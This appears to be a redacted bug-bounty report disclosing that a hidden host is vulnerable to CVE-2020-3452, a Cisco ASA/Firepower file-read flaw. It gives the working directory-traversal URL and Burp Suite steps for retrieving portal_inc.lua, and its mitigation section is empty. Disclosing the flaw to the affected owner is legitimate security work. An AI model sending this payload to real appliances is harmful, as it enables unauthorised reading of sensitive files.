[CVE-2020-3452] on ███████

The following subdomain is vulnerable to CVE-2020-3452, which is an unauthenticated file read in Cisco ASA & Cisco Firepower. # URL: https://████/ # Vulnerable URL: https://███/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ ██████████ # Resources: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 ## Impact The vulnerability could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. ## System Host(s) ███ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2020-3452 ## Steps to Reproduce * Go to https://██████/+CSCOE+/logon.html * Intercept the request with Burpsuite * Send the request to Repeater * Change the URL path to the following `/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../as` an example to read "/+CSCOE+/portal_inc.lua" file. * You will get the portal_inc.lua file ## Suggested Mitigation/Remediation Actions